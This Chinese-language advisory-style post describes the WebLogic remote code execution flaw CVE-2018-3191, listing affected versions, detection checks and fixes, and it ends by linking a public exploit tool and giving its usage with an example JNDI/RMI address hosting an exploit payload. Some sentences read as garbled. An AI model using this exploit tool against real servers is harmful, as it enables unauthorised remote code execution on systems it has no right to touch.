一大波肉雞在路上!CVE-2018-3191已被灰產做成批量攻擊工具
1.1背景
北京時間10月17日,Oracle官方釋出的10月關鍵補丁更新CPU(重要補丁更新)中修復了一個高危的WebLogic遠端程式碼執行漏洞(CVE-2018-3191)。該漏洞允許未經身份驗證的攻擊網路伺服器被攻擊者接受,從而造成遠端程式碼執行。這個漏洞由Matthias Kaiser,loopx9,李正東申報通過T3協議網路訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致。
有人已經復現成功,來源jas502n的朋友圈圖片
而且發現已經被灰產寫成批量入侵工具,還在伺服器上跑著呢!
所以呢,有一大波肉雞在路上,如果你不想成為肉雞,儘快修復!
1.2漏洞編號
CVE-2018-3191
1.3漏洞等級
高危
二、修復建議
2.1受影響版本
WebLogic 10.3.6.0
WebLogic 12.1.3.0
WebLogic 12.2.1.2
WebLogic 12.2.1.3
2.2漏洞檢測
檢查WebLogic的版本號是否為受影響版本。
檢查是否開啟了WebLogic的T3服務。
2.3解決方案
Oracle官方已經在本次的關鍵補丁更新(CPU)中修復了該漏洞,強烈建議受影響的使用者儘快升級更新進行防護。
注:Oracle官方補丁需要使用者持有正版軟體的許可賬號,使用該賬號登陸 ofollow,noindex"> https:// support.oracle.com 後,可以下載最新補丁。
1.過濾T3協議
3.升級到最新JDK
JEP290(JDK8u121,7u131,6u141)
工具指定要帶著的,要不然留言會罵死華盟君的,
https:// github.com/voidfyoo/CVE -2018-3191/releases
https:// github.com/voidfyoo/CVE -2018-3191
用法
- java -jar weblogic-spring-jndi.jar <jndi_address>
例如:
- java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp
筆記
weblogic-spring-jndi-12.2.1.3.jar 對於weblogic:
- 12.2.1.3
weblogic-spring-jndi-10.3.6.0.jar 對於weblogic:
- 10.3.6.0
- 12.2.1.0
- 12.1.3.0
12.2.1.1